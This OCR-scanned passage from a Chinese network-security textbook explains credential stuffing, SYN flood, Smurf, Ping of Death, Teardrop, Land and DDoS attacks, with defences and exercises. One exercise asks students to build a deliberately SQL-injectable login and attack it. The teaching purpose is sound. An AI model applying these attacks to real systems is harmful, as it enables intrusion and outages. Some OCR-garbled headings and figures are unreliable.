实例 : 请 访问 http://www. wooyun. org/bugs/wooyun-2010-0795 ,查看 人 人 网 某 频道 
的 XSS 漏洞 。 


6.13 撞 库 攻击 


6.13.1 “ 撞 库 ” 


2014 年 12 月 ,网 上 爆 出 12306 网 站 用 户 信 息 泄露 ,后 经 确认 ,实际 上 是 黑客 利用 “ 撞 
库 ” 的 方式 来 获得 12306 网 站 的 部 分 用 户 信息 。 自 此 … 撞 库 ? 被 大 家 所 熟知 ,其 实 早 在 2014 
年 4 月 ,就 出 现 过 京东 的 撞 库 抹黑 事件 。 

那么 什么 是 “ 撞 库 ” 呢 ? 

撞 库 就 是 用 其 他 网 站 的 用 户 信息 数据 库 , 批 量 无 限制 的 尝试 登录 要 攻击 的 目标 网 站 。 
本 质 上 来 讲 ,“ 撞 库 ” 是 利用 了 用 户 在 不 同 网 站 登录 时 使 用 相同 的 用 户 名 和 密码 的 行为 缺点 ， 
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进而 获取 用 户 在 其 他 网 站 的 信息 ,从 中 获取 经 济 利益 。 

通过 近 些 年 的 数据 分 析 , 因 为 一 些 大 公司 的 用 户 数据 泄漏 ,使 得 黑客 手中 可 能 拥有 了 上 
亿 条 的 用 户 信息 ,其 中 ,部 分 用 户 密码 还 是 明文 形式 存在 的 ,以 前 暴力 破解 用 户 的 密码 ,还 需 
要 通过 密码 字典 一 个 一 个 尝试 ,现在 就 更 加 简单 了 ,只 需要 通过 简单 的 用 户 名 查询 ,就 可 以 
猜 到 用 户 的 密码 了 ,简单 而 粗暴 ,这 就 是 大 数据 的 一 种 体现 方式 ,从 中 也 说 明了 数据 的 重要 
性 ,甚至 超过 了 算法 的 重要 性 。 

但 是 撞 库 需要 的 其 他 网 站 的 用 户 信 息 数据 库 怎 么 获得 呢 ? 为 了 描述 清楚 * 撞 库 ”, 就 不 
得 不 提 到 “ 拖 库 ” 和 "“ 洗 库 ”。 


6.13.2 “ 拖 库 ” 


从 上 述 的 描述 看 ,要 撞 库 ,必须 要 有 用 户 信息 数据 库 , 这 个 信息 的 获取 ,就 要 通过 前 几 节 
我 们 所 说 的 各 种 技术 手段 和 社会 工程 方法 获得 ,从 专业 术语 上 讲 , 叫 做 " 拖 库 ”, 亦 称 " 脱 裤 ”， 
就 是 通过 入 侵 有 价值 的 站 点 ,把 用 户 的 信息 盗 走 。 

获取 到 的 用 户 信息 ,包含 了 邮箱 .QQ 号码、 电话、 真实 姓名 、 性 别 ,如 果 入 侵 的 是 电 商 网 
站 ,还 可 能 获得 用 户 的 身份 证 号 ,地 址 和 工作 单位 等 更 加 敏感 的 信息 ,这 为 黑客 进一步 人 侵 
相关 网 站 提供 了 便利 的 条 件 。 


6.13.3 "iE" 


黑客 获取 到 大 量 的 用 户 信息 后 ,会 对 数据 库 详细 利用 ,通过 技术 手段 分 离 出 各 种 有 用 的 
信息 ,一 方面 ,将 这 些 用户 信 息 出 售 给 各 个 商家 ,商家 可 以 利用 这 些 信 息 进 行 广告 营销 ,或 次 
询 调 研 ,甚至 是 诈骗 ; 另 一 方面 ,分 离 出 的 有 用 信息 ,会 被 拿 去 进一步 “ 撞 库 ”, 去 尝试 登录 游 
戏 网 站 、 电 商 平台 ,其 至 是 网 银 等 金融 类 的 网 站 ,去 获取 更 多 的 经 济 利益 ,从 而 形成 了 一 条 黑 
色 的 地 下 产业 链 , 这 样 ,用 户 的 数据 就 变 成 了 白花 花 的 银子 。 同 时 ,由 于 用 户 更 新 个 人 信息 
的 迟滞 性 ,这 些 用 户 数据 会 一 直 持续 的 危害 用 户 的 安全 。 


6.13.4 ”对 “ 撞 库 ”攻击 的 防御 


首先 从 用 户 角 度 来 讲 , 要 保证 自己 在 各 个 重要 网 站 的 密码 不 一 致 ,并 且 每 隔 一 定 的 时 
间 , 就 更 换 自己 的 密码 ; 尽 可 能 不 要 在 公共 无 线 环境 下 ,登录 自己 的 帐号 。 

其 次 从 网 站 角度 来 讲 , 登 录 要 有 验证 设置 ,当然 ,这 会 降低 用 户 的 体验 ; 加 上 IP 限制 ， 
判断 同一 IP 在 某 个 时 间 段 内 登录 的 用 户 数 ,以 防范 无 限制 的 登录 尝 

实例 : 请 访问 http://www. wooyun. org/bugs/wooyun-2014-061871 ,查看 锤子 网 的 撞 
库 漏洞 。 


习 题 6 


一 、 填空 题 
1. 黑客 攻击 五 部 曲 : š 2 
2. 社会 工程 学 攻击 主要 包括 两 种 方式 : 
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3. 扫描 一 般 分 成 两 种 策略 : $ 
4. GetNTUser 工具 软件 的 功能 是 
5. 网 络 人 侵 威胁 分 为 三 类 : 
6. 一 次 字典 攻击 能 否 成 功 , 很 大 因素 上 决定 于 
二 、 选 择 题 
1. 下 面 哪些 不 是 SQL 注入 产生 的 原因 ? C ) 
A. 不 安全 的 数据 库 配 置 B. 不 合理 的 查询 集 处 理 
C. 不 当 的 类 型 处 理 D. 操作 系统 配置 不 合理 
2. 下 列 有 关 SQL 注入 说 明 最 合适 的 是 ( )。 
A. 构建 特殊 的 参数 传递 给 操作 系统 变量 
B. 构建 特殊 的 SQL 语句 输入 给 服务 器 
C. 构建 特殊 的 参数 输入 给 Web 应 用 程序 
D. 构建 特殊 的 SQL 语句 直接 输入 给 SQL 服务 器 
3. 有 关 旁 注 攻击 说 明正 确 的 是 ( — 0. 
A. 指 的 是 从 旁边 的 服务 器 发 动 攻击 
D. 要 使 用 旁 注 攻击 ,首先 利用 工具 查询 同一 服务 器 的 其 他 网 站 的 域名 
C. 对 付 旁 注 攻击 最 好 的 方法 是 每 用 户 每 权限 
D.， 旁 注 攻 击 不 需要 提 权 
4. 有 关 XSS 攻击 说 明正 确 的 是 ( Je 
A. 攻击 者 通过 攻击 Web 页 面 插入 恶意 HTML 代码 , 当 用 户 浏览 时 恶意 代码 便 会 
被 执行 
B. 设计 者 通过 在 网 页 内 写 人 恶意 脚本 , 当 用 户 运 行 时 窃取 用 户 的 信息 
C. 只 要 过 滤 掉 JavaScript 关键 字符 ,就 能 防止 XSS 攻击 
D. XSS 攻击 是 无 法 防御 的 
三 、 简 答题 
1. 简 述 社会 工程 学 攻击 的 原理 。 
2. 登录 系统 以 后 如 何 得 到 管理 员 密 码 ? 如 何 利用 普通 用 户 建立 管理 员 账 户 ? 
3. 简 述 暴力 攻击 的 原理 。 暴 力 攻击 如 何 破解 操作 系统 的 用 户 密码 、 如 何 破解 邮箱 密 
码 、 如 何 破 解 Word 文档 的 密码 ? 针对 暴力 攻击 应 如 何 防御 ? 
4. 简 述 缓冲 区 溢出 攻击 的 原理 。 
5. 请 利用 AND 或 者 OR 规则 书写 一 段 可 作为 SQL 注入 的 语句 。 
四 、 综 合 题 
请 用 Java 书写 一 个 登录 系统 的 Web 程序 ,用 Statement 语句 而 不 使 用 PreparedStatement 
语句 ; 利用 safe3 Web 漏洞 扫描 你 设计 的 系统 ,检测 可 能 的 漏洞 .并 尝试 利用 SQL 注入 工 
具 进 行 攻击 。 


5157 3€ Dos 和 了 DDoSs 


E 掌握 SYN 风暴 和 Smurf st 
W 了 解 DDoS 攻击 。 


凡是 造成 目标 计算 机 拒绝 提供 服务 的 攻击 都 被 称 为 拒绝 服务 (Denial of Service, DoS) 
攻击 ,其 目的 是 使 目标 计算 机 或 网 络 无 法 提供 正常 的 服务 。 最 常见 的 DoS 攻击 是 计算 机 网 
络 带 宽 攻击 和 连通 性 攻击 。 

带宽 攻击 是 以 极 大 的 通信 和 量 冲 击 网 络 , 使 网 络 所 有 可 用 带宽 都 被 消耗 掉 , 最 后 导致 合法 
用 户 的 请 求 无 法 通过 。 

连通 性 攻击 指 用 大 量 的 连接 请 求 冲 击 计 算 机 ,最 终 导致 计算 机 无 法 再 处 理 合法 用 户 的 
请 求 。 一 个 最 贴切 的 例子 就 是 : 有 成 百 上 千 的 人 给 同一 个 电话 打 电 话 , 这 样 其 他 用 户 就 再 
也 打 不 进 电 话 了 ,这 就 是 连通 性 DoS 攻击 。 


7.1 SYN 风暴 


1996 年 9 月 以 来 ,许多 Internet 站 点 遭受 了 一 种 称 为 SYN 风暴 (SYN Flooding) fl] JE 
绝 服务 攻击 。 它 是 通过 创建 大 量 * 半 连接 ?来 进行 攻击 。 任 何 连接 到 Internet. 上 并 提供 基于 
TCP 的 网 络 服务 (如 WWW 服务 ,FTP 服务 ,邮件 服务 等 ) 的 主机 都 可 能 遭受 这 种 攻击 。 

针对 不 同系 统 ,攻击 的 结果 可 能 不 同 ,但 是 攻击 的 根本 都 是 利用 这 些 系 统 中 TCP/IP 协 
议 族 的 设计 和 缺陷 。 只 有 对 现 有 TCP/IP 协议 族 进行 重大 改变 才能 修正 这 些 缺 陷 。 目 前 还 
没有 一 个 完整 的 解决 方案 ,但 是 可 以 采取 一 些 措施 尽量 降低 这 种 攻击 发 生 的 可 能 性 , 减 小 
损失 。 


7.1.1. SYN 风暴 背景 介绍 


IP 协议 是 Internet 网 络 层 的 标准 协议 ,提供 了 不 可 靠 的 、 无 连接 的 网 络 分 组 传输 服务 。 
IP 协议 的 基本 数据 传输 单元 称 为 网 络 包 。 

所 谓 的 “不 可 靠 ” 是 指 不 保证 数据 报 在 传输 过 程 中 的 可 靠 性 和 正确 性 , 即 数 据 报 可 能 丢 
失 , 可 能 重复 ,可 能 延迟 ,也 可 能 被 打 乱 次 序 。 

所 谓 “ 无 连接 "是 指 传输 数据 报 之 前 不 建立 虚 电 路 ,每 个 包 都 可 能 经 过 不 同 路 径 传输 ,其 
中 有 些 包 可 能 会 丢失 。 

TCP 协议 位 于 IP. 协议 和 应 用 层 协 议 之 间 , 提 供 了 可 靠 的 、 面 向 连接 的 数据 流传 输 
服务 。 

TCP 协议 可 以 保证 通信 双方 的 数据 报 能 够 按 序 无 误 传输 ,不 会 发 生出 错 、 丢 失 、 重 复 、 
乱 序 的 现象 。TCP 通过 流 控制 机 制 ( 如 滑动 窗口 协议 ) 和 重 传 等 技术 来 实现 可 靠 的 数据 报 
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传输 。 

SYN 攻击 属于 DoS 攻击 的 一 种 , 它 利 用 TCP 协议 缺陷 ,通过 发 送 大 量 的 半 连 接 请 求 ， 
耗费 CPU 和 内 存 资源 。SYN 攻击 除了 能 影响 主机 外 ,还 可 以 危害 路 由 器 ,防火 墙 等 网 络 系 
统 ,事实 上 SYN 攻击 并 不 管 目标 是 什么 系统 ,只 要 这 些 系统 打开 TCP 服务 就 可 以 实施 。 


7.1.2 SYN 原理 


TE SYN Flooding 攻击 中 ,利用 TCP 三 次 握手 协议 的 缺陷 ,攻击 者 向 目标 主机 发 送 大 量 
伪造 源 地 址 的 TCP SYN 报 文 ,目标 主机 分 配 必要 的 资源 ,然后 向 源 地 址 返回 SYN 十 ACK 
包 , 并 等 待 源 端 返回 ACK 包 。 由 于 源 地 址 是 伪造 的 ,所 以 源 端 永远 都 不 会 返回 ACK 报 文 ， 
受害 主机 继续 发 送 SYN 十 ACK 包 , 并 将 半 连 接 放 入 端口 的 积压 队列 中 ,虽然 一 般 的 主机 都 
有 超时 机 制 和 默认 的 重 传 次 数 ,但 由 于 端口 的 半 连 接 队列 的 长 度 是 有 限 的 ,如 果 不 断 地 向 受 
害 主机 发 送 大 量 的 TCP SYN 报 文 , 半 连接 队列 就 会 很 快 填 满 ,服务 器 拒绝 新 的 连接 ,导致 
该 端口 无 法 响应 其 他 机 器 进行 的 连接 请 求 ,最 终 使 受害 主机 的 资源 耗 尽 。 

握手 的 第 一 个 报 文 段 的 码 元 字段 的 SYN 为 被 置 1。 第 二 个 报 文 的 SYN 和 ACK 均 被 
置 1 ,指出 这 时 对 第 一 个 SYN 报 文 段 的 确认 并 继续 握手 操作 。 最 后 一 个 报 文 仅仅 是 一 个 确 
i ri E ,通知 目的 主机 已 成 功 建立 了 双方 所 同意 的 这 个 连接 。 

针对 每 个 连接 ,连接 双方 都 要 为 该 连接 分 配 以 下 内 存 资源 。 

(1) Socket( 套 接 字 ) 结 构 , 描 述 所 使 用 的 协议 ,状态 信息 ,地 址 信息 ,连接 队列 ,缓冲 区 
和 其 他 标志 位 等 。 

(2) Internet 协议 控制 块 结构 (Inpcb) ,描述 TCP 状态 信息 ,IP 地 址 ,端口 号 ,IP 头 原 
型 ,目标 地 址 ,其 他 选项 等 。 

(3) TCP 控制 块 结构 (TCPcb) ,描述 时 钟 信息 ,序列 号 , 流 控 制 信息 , 带 外 数据 等 。 

一 般 情况 下 ,为 每 个 连接 分 配 的 这 些 内 存单 元 的 大 小 都 会 超过 280 字 节 。 

当 接 收 端 收 到 连接 请 求 的 SYN 包 时 ,就 会 为 该 连接 分 配 上 面 提 到 的 数据 结构 ,因此 只 
能 有 有 限 个 连接 处 于 半 连 接 状态 ( 称 为 SYN- RECVD 状态 ) ,系统 会 为 过 多 的 半 连 接 而 耗 
尽 内 存 资源 ,进而 拒绝 为 合法 用 户 提供 服务 。 当 半 连 接 数 达到 最 大 值 时 ,TCP 就 会 丢弃 所 
有 后 续 的 连接 请 求 , 此 时 用 户 的 合法 连接 请 求 也 会 被 拒绝 。 但 是 ,受害 主机 的 所 有 外 出 连接 
请 求 和 所 有 已 经 建立 好 的 连接 将 不 会 受到 影响 。 这 种 状况 会 持续 到 半 连 接 超 时 ,或 某 些 连 
接 被 重 置 或 释放 。 

如 果 攻 击 者 盗用 的 是 某 台 可 达 主 机 X 的 IP 地 址 ,由 于 主机 X 没有 向 主机 D 发 送 连接 
请 求 , 所 以 当 它 收 到 来 自 D 的 SYN 十 ACK 包 时 ,会 向 D 发 送 RST 包 , 主 机 D 会 将 该 连接 
ED. 

而 攻击 者 通常 伪造 主机 D 不 可 达 的 IP 地 址 作为 源 地 址 。 为 了 使 拒绝 服务 的 时 间 长 于 
超时 所 用 的 时 间 ,攻击 者 会 持续 不 断 地 发 送 SYN 包 , 所 以 称 为 “SYN 风暴 ”。 


7.1.3 防范 措施 


T 


l. 优化 系统 配置 
缩短 超时 时 间 ,使 得 无 效 的 半 连 接 能 够 尽快 释放 ,但 是 可 能 会 导致 超过 该 阀 值 的 合法 连 
接 失效 。 增 加 半 连 接 队 列 的 长 度 ,使 得 系统 能 够 同时 处 理 更 多 的 半 连 接 。 关 闭 不 重要 的 服 
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务 , 减 小 被 攻击 的 可 能 。 

2. 优化 路 由 器 配置 

配置 路 由 器 的 外 网 卡 , 丢 奔 那 些 来 自 外 部 网 而 源 LP 地 址 具有 内 部 网 络 地 址 的 包 。 这 种 
方法 不 能 完全 杜绝 SYN 风暴 攻击 ,但 是 能 够 有 效 地 减少 被 攻击 的 可 能 ,特别 是 当 全 球 的 
ISP 都 正确 合理 地 配置 他 们 的 路 由 器 的 时 候 。 特 别 需 要 强调 的 是 ,优化 路 由 器 配置 对 几乎 
所 有 伪造 源 地 址 的 拒绝 服务 攻击 都 能 进行 有 效 的 限制 , 减 小 被 攻击 的 可 能 。 

3. 完善 基础 设施 

现 有 的 网 络 体系 结构 没有 对 源 TP. 地 址 进行 检查 的 机 制 , 同 时 也 不 具备 追踪 网 络 包 的 物 
理 传 输 路 径 的 机 制 ,使 得 发 现 并 惩治 作恶 者 很 困难 。 而 且 很 多 攻击 手段 都 是 利用 现 有 网 络 
协议 的 缺陷 ,因此 ,对 整个 网 络 体系 结构 的 再 改造 十 分 重要 。 

4. 使 用 防火 墙 

现在 多 厂商 的 防火 墙 产品 实现 了 半 透 明 网 关 技 术 ,能 够 有 效 地 防范 SYN 风暴 攻击 ， 
时 保证 了 很 好 的 性 能 。 

5. 主动 监视 

即 在 网 络 的 关键 点 上 安装 监视 软件 ,这 些 软件 持续 监视 TCP/IP 流量 ,收集 通信 控制 信 
息 , 分 析 通 信 状 态 ,辨别 攻击 行为 ,并 及 时 做 出 反应 。 


T 
可 


7.2 Smurf 攻击 


Smurf 攻击 是 以 最 初 发 动 这 种 攻击 的 程序 Smurf 来 命名 的 。 这 种 攻击 方法 结合 使 用 了 
IP 欺骗 和 带 有 广播 地 址 的 ICMP( 互 联网 控制 消息 协议 ) 请 求 -响应 方法 使 大 量 网 络 传输 充 
斥 目标 系统 ,引起 目标 系统 拒绝 为 正常 系统 进行 服务 ,属于 间接 、 借 力 攻击 方式 。 任 何 连接 
到 互联 网 上 的 主机 或 其 他 支持 ICMP 请 求 -响应 的 网 络 设 备 都 可 能 成 为 这 种 攻击 的 目标 。 


7.2.1 攻击 手段 


ICMP 协议 用 来 传达 状态 信息 和 错误 信息 (如 网 络 拥塞 指示 等 网 络 传输 问题 ) ,并 交换 控 
制 信息 。 同 时 ICMP 还 是 诊断 主机 或 网 络 问题 的 有 用 工具 。 可 以 使 用 ICMP 协议 判断 某 台 
机 是 否 可 达 , 通 常 以 ping 命令 实现 ,许多 操作 系统 和 网 络 软件 包 都 包含 了 该 命令 。 即 向 目 
标 主机 D 发 送 ICMP echo 请 求 包 ,如果 D 收 到 该 请 求 包 ,会 发 送 echo 响应 包 作为 回答 。 


7.2.2 原理 


Smurf 是 一 种 很 古老 的 DoS 攻击 。 这 种 方法 使 用 了 广播 地 址 ,广播 地 址 的 尾数 通常 为 
0, 例 如 : 192. 168. 1.0。 在 一 个 有 N 台 计 算 机 的 网 络 中 , 当 其 中 一 台 主 机 向 广播 地 址 发 送 
了 1KB 大 小 的 ICMP Echo Request 时 ,那么 它 将 收 到 N KB 大 小 的 ICMP Reply, 如 果 N 
足够 大 它 将 淹没 该 主机 ,最 终 导 致 该 网 络 的 所 有 主机 都 对 此 ICMP Echo Request 1 H 48 
复 ,使 网 络 阻塞 ! 利用 此 攻击 时 ,假冒 受害 主机 的 IP, 那 么 它 就 会 收 到 应 答 ,形成 一 次 拒绝 
服务 攻击 。Smurf 攻击 的 流量 比 Ping of Death 洪水 的 流量 高 出 一 两 个 数量 级 ,而 且 更 加 
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隐蔽 。 
7.2.3 ”攻击 行为 的 元 素 


Smurf 攻击 行为 的 完成 涉及 三 个 元 素 : 攻击 者 (Attacker) .中 间 脆 弱 网 络 (Intermediary) 和 
目标 受害 者 (Victim ) 。 

攻击 者 伪造 一 个 1 CMP echo 应 答 请 求 包 ,其 源 地 址 为 目标 受害 者 地 址 ,目的 地 址 为 中 
间 脆 弱 网 络 的 广播 地 址 ,并 将 该 echo 请 求 包 发 送 到 中 间 脆 弱 网 络 。 

中 间 脆 弱 网 络 中 的 主机 收 到 这 个 ICMP echo 请 求 包 时 ,会 以 echo 响应 包 作 为 回答 ,而 
这 些 包 最 终 被 发 送 到 目标 受害 者 。 这 样 ,大 量 同时 返回 的 echo 响应 数据 包 将 造成 目标 网 络 
严重 拥塞 、 丢 包 , 甚 至 完全 不 可 用 等 现象 。 

尽管 中 间 脆 弱 网 络 ( 又 称 反弹 站 点 ,Bounce-Sites) 没 有 被 称 为 受害 者 ,但 实际 上 中 间 网 
络 同样 为 受害 方 , 其 性 能 也 遭受 严重 影响 。 黑 客 通常 首先 在 全 网 范围 内 搜索 不 过 滤 广 播 包 
的 路 由 器 和 急剧 放大 网 络 流量 。Smurf 攻击 的 一 个 直接 变种 称 为 Fraggle, 两 者 的 不 同 点 在 
于 后 者 使 用 的 是 UDP echo 包 , 而 不 是 ICMP echo 包 。 


7.2.4 分 析 


假设 攻击 者 位 于 带宽 为 T1 的 网 中 ,使 用 一 半 的 带宽 (768Kbps) 发 送 伪 造 的 echo 请 求 
包 到 带宽 为 T3 中 间 网 络 Bl 和 B2; 假设 Bl 中 有 80 台 主 机 ,B2 中 有 100 台 主 机 ,那么 BI 将 
会 产生 384KbpsX80=30Mbps 的 外 出 流量 ,B2 44 & j^ Æ C384 Kbps X 100) —37. 5Mbps 的 
外 出 流量 ; 此 时 目标 受害 者 将 承受 30Mbps 十 37. 5Mbps= 67. 5Mbps 的 冲击 。 

由 此 可 见 中 间 网 络 起 到 一 个 放大 器 的 作用 。 攻 击发 生 时 ,不 论 是 子 网 内 部 还 是 面向 
Internet 的 连接 ,中 间 网 络 和 目标 受害 主机 所 在 的 网 络 性 能 都 会 急剧 下 降 , 直 到 网 络 不 可 
用 。 这 种 攻击 与 Ping Flooding 和 UDP Flooding 的 原理 相似 , 正 是 这 种 流量 放大 功能 ,使 
得 它 具 有 更 强 的 攻击 力 。 网 络 攻 击 会 发 动 网 络 上 大 量 的 节点 成 为 攻击 的 协同 者 ,这 是 网 络 
攻击 的 最 可 怕 之 处 ,如 图 7-1 所 示 。 对 抗 这 类 攻击 应 该 从 以 下 三 方面 人 手 。 

第 一 步 ， 攻 击 者 向 被 利用 网 络 A 的 广播 地 址 发 送 一 个 


ICMP 协 议 的 echo 请 求 数 据 报 ， 该 数据 报 源 地 址 被 伪 
造成 210.25.82.79 


---------~- E 被 利用 的 网 络 A : 10.24.5.0 


攻击 者 网 络 27 
1 10.24.38.0 一 
S. 


被 攻击 的 网 络 : g m 
210.25.82.79 第 二 步 ， 网 络 A 上 的 所 有 主机 都 向 该 伪造 
的 地 址 返回 响应 ， 该 主机 服务 中 断 


7-1 Smurf 攻击 过 程 
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1. 针对 中 间 网 络 

配置 路 由 器 禁止 IP 广播 包 进 网 ,在 路 由 器 的 每 个 端口 关闭 IP 广播 包 的 转发 设置 ; 可 
能 的 情况 下 ,在 网 络 边界 处 使 用 访问 控制 列表 (Access Control List, ACL) ,过 滤 掉 所 有 目标 
地 址 为 本 网 络 广播 地 址 的 包 ; 不 充当 中 间 脆 弱 网 络 ,对 于 不 提供 穿 透 服 务 的 网 络 , 可 以 在 出 
口 路 由 器 上 过 滤 掉 所 有 源 地 址 不 是 本 网 地 址 的 数据 包 ; 配置 主机 的 操作 系统 ,使 其 不 响应 
带 有 广播 地 址 的 ICMP 包 。 

2. 针对 目标 受害 者 

没有 什么 简单 的 解决 方法 能 够 带 助 受 害 主机 , 当 攻 击发 生 时 ,应 尽快 重新 配置 其 所 在 网 
络 的 路 由 器 ,以 阻塞 这 些 ICMP 响应 包 。 但 是 受害 主机 的 路 由 器 和 受害 主机 ISP 之 间 的 拥 
塞 不 可 避免 。 同 时 ,也 可 以 通知 中 间 网 络 的 管理 者 协同 解决 攻击 事件 。 被 攻击 目标 与 ISP 
协商 ,请 ISP 暂时 阻止 这 些 流量 。 

3. 针对 发 起 攻击 的 主机 及 其 网 络 

Smurf 攻击 通常 会 使 用 欺骗 性 源 地 址 发 送 echo 请 求 , 因 此 在 路 由 器 上 配置 其 过 滤 规 
则 ,丢弃 那些 即将 发 到 外 部 网 而 源 IP 地 址 不 具有 内 部 网 络 地 址 的 包 。 这 种 方法 尽管 不 能 消 
灭 IP 欺骗 的 包 , 却 能 有 效 降低 攻击 发 生 的 可 能 性 。 


7.3 利用 处 理 程序 错误 进行 攻击 


SYN Flooding 和 Smurf 攻击 利用 TCP/IP 协议 中 的 设计 弱点 ,通过 强行 引入 大 量 的 网 
络 包 来 占用 带宽 ,人 迫使 目标 受害 主机 拒绝 对 正常 的 服务 请 求 进行 响应 。 利 用 TCP/IP 协议 
实现 中 的 处 理 程序 错误 进行 攻击 , 即 故意 错误 地 设 定 数据 包头 的 一 些 重要 字段 ,将 这 些 错 误 
的 IP 数 据 包 发 送出 去 

在 接收 数据 端 ， 服务 程序 通常 都 存在 一 些 问 题 ,因而 在 将 接收 到 的 数据 包 组 装 成 一 个 完 
整 的 数据 包 的 过 程 中 ,就 会 使 系统 死机 、 挂 起 或 崩溃 ,从 而 无 法 继续 提供 服务 。 ul. 包 
括 广为人知 的 Ping of Death ,当前 十 分 流行 的 Teardrop 攻击 和 Land 攻击 。 

1. Ping of Death 攻击 


攻击 者 故意 创建 一 个 长 度 大 于 65 535 字 节 (IP 协议 中 规定 最 大 的 IP 包 长 为 65 535 个 
F ping 包 , 并 将 该 包 发 送 到 目标 受害 主机 ,由 于 目标 主机 的 服务 程序 无 法 处 理 过 大 的 
包 , 从 而 引起 系统 崩溃 、 挂 起 或 重 起 ,目前 所 有 的 操作 系统 开发 商都 对 此 进行 了 修补 或 升级 。 
2. Teardrop 攻击 


一 个 IP 分 组 在 网 络 中 传播 的 时 候 , 由 于 沿途 各 个 链 路 的 最 大 传输 单元 不 同 , 路 由 器 常 
常会 对 IP 包 进 行 分 组 ,即将 一 个 包 分 成 一 些 片段 ,使 每 段 都 足够 小 ,以 便 通过 这 些 狭 窗 的 链 
路 。 每 个 片段 将 具有 自己 完整 的 IP 包头 ,其 大 部 分 内 容 和 最 初 的 包头 相同 ,一 个 很 典型 的 
不 同 在 于 包头 中 还 包含 偏 移 量 字段 C。 随 后 各 片段 将 沿 各 自 的 路 径 独立 地 转发 到 目的 地 ， 
在 目的 地 最 终 将 各 个 片段 进行 重组 ,这 就 是 所 谓 的 IP 包 的 分 段 重组 技术 。Teardrop 攻击 
就 是 利用 IP 包 的 分 段 重组 技术 在 系统 实现 中 的 一 个 错误 。 
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Teardrop 利用 TCP 分 段 重组 时 的 一 个 漏洞 。 正 常 的 分 段 是 首尾 相 接 的 ,Teardrop 使 
分 片 相 互 交 叉 。 假 设 数据 包 中 第 二 段 IP 包 的 偏 移 量 小 于 第 一 段 结束 的 位 移 , 而 且 算 上 第 二 
BE IP & fl] Data, 也 未 超过 第 一 段 的 尾部 ,这 就 是 重 释 现象 。 利 用 这 个 漏洞 对 系统 主机 发 动 
拒绝 服务 攻击 ,最 终 导致 主机 死机 ; 对 于 Windows 系统 会 导致 蓝屏 死机 ,并 显示 STOP 
0x0000000A 错误 。 

检测 方法 : 对 接收 到 的 分 片 数据 包 进 行 分 析 , 计 算数 据 包 的 片 偏 移 量 (Offset) 是 否 
有 误 。 

反攻 击 方法 : 添加 系统 补丁 程序 ,丢弃 收 到 的 病态 分 段 数据 包 并 对 这 种 攻击 进行 审计 。 
尽 可 能 采用 最 新 的 操作 系统 ,或 者 在 防火 墙 上 设置 分 段 重 组 功能 ,由 防火 墙 先 接收 到 同一 源 
包 中 的 所 有 拆 分 数据 包 , 然 后 完成 重组 工作 ,而 不 是 直接 转发 ,因为 防火 墙 上 可 以 设置 当 出 
现 重 友 字段 时 所 采用 的 规则 。 

3. Land 攻击 

Land 也 是 一 个 十 分 有 效 的 攻击 工具 , 它 对 当前 流行 的 大 部 分 操作 系统 及 一 部 分 路 由 器 
都 具有 相当 强 的 攻击 能 力 。 攻 击 者 利用 目标 受害 系统 的 自身 资源 实现 攻击 意图 。 由 于 目标 
受害 系统 具有 漏洞 和 通信 协议 的 弱点 ,这样 就 给 攻击 者 提供 了 攻击 的 机 会 。 

这 种 类 型 的 攻击 利用 TCP/IP 协议 实现 中 的 处 理 程序 错误 进行 攻击 ,因此 最 有 效 最 直 
接 的 防御 方法 是 尽早 发 现 潜在 的 错误 并 及 时 修改 这 些 错 误 。 在 当前 的 软件 行业 里 , 太 多 的 
程序 存在 安全 问题 。 

从 长 远 角 度 考虑 ,在 编制 软件 的 时 候 应 更 多 地 考虑 安全 问题 ,程序 员 应 使 用 安全 编程 技 
巧 , 全 面 分 析 预 测 程序 运行 时 可 能 出 现 的 情况 。 同 时 测试 也 不 能 只 局 限 在 功能 测试 ,应 更 多 
地 考虑 安全 问题 。 换 名 话说 ,应 该 在 软件 开发 的 各 个 环节 都 灌输 安全 意识 和 法 则 ,提高 代码 
质量 ,减少 安全 漏洞 。 

在 Land 攻击 中 ,SYN 包 中 的 源 地 址 和 目标 地 址 都 被 设置 成 某 一 个 服务 器 地 址 ,这 时 将 
导致 接受 服务 器 向 它 自己 的 地 址 发 送 SYN 一 一 ACK 消息 ,结果 这 个 地 址 又 发 回 ACK 消息 
并 创建 一 个 空 连接 ,每 一 个 这 样 的 连接 都 将 保留 直到 超时 掉 。 不 同 的 操作 系统 对 Land 攻 
击 的 反应 不 同 , 许 多 UNIX 系统 将 崩溃 ,而 Windows NT 会 变 得 极其 缓慢 (大 约 持续 5 分 
Bo. 


7.4. 分 布 式 拒绝 服务 攻击 


DDoS( Distributed Denial of Service ,分布 式 拒绝 服务 ) 攻 击 ,其 攻击 者 利用 已 经 侵入 并 
控制 的 主机 ,对 某 一 主机 发 起 攻击 ,被 攻击 者 控制 着 的 计算 机 有 可 能 是 数 百 台 机 器 。 在 基 殊 
的 带宽 力量 对 比 下 ,被 攻击 的 主机 会 很 快 失去 反应 ,无 法 提供 服务 ,从 而 达到 攻击 的 目的 。 
实践 证 明 , 这 种 攻击 方式 是 非常 有 效 的 ,而 且 难 以 抵挡 。 


7.4.1 DDoS 的 特点 


分 布 式 拒绝 服务 攻击 的 特点 是 先 使 用 一 些 典型 的 黑客 人 侵 手 段 控制 一 些 高 带宽 的 服务 
器 ,然后 在 这 些 服务 器 上 安装 攻击 进程 , 集 数 十 台数 百 台 甚至 上 千 台 机 器 的 力量 对 单一 攻 
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击 目标 实施 攻击 。 在 悬殊 的 带宽 力量 对 比 下 ,被 攻击 的 主机 会 很 快 因 不 胜 重负 而 瘫痪 。 分 
布 式 拒绝 服务 攻击 技术 发 展 十 分 迅速 ,由 于 其 隐蔽 性 和 分 布 性 很 难 被 识别 和 防御 。DDoS 
的 结构 如 图 7-2 所 示 。 
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Æ 7-2 DDoS 的 结构 图 
7.4.2 攻击 手段 


人 每 个 主 控 端 (Handle/Master) 是 一 台 已 被 攻击 者 入侵 
并 运行 了 特定 程序 的 系统 主机 。 每 个 主 控 端 主机 能 够 控制 多 个 代理 端 (分 布 端 Agent), 
每 个 代理 端 也 是 一 台 已 被 人 侵 并 运行 某 种 特定 程序 的 系统 主机 ,是 执行 攻击 的 角色 。 多 个 
代理 端 (分 布 端 ) 能 够 同时 响应 攻击 命令 并 向 被 攻击 目标 主机 发 送 拒绝 服务 攻击 数据 包 。 攻 
击 过 程 实施 的 顺序 为 : 攻击 者 一 主 控 端 分 布 端 习 目 标 主机 。 发 动 DDoS 攻击 分 为 以 下 两 
个 阶段 。 

1. 初始 的 大 规模 入 侵 阶段 

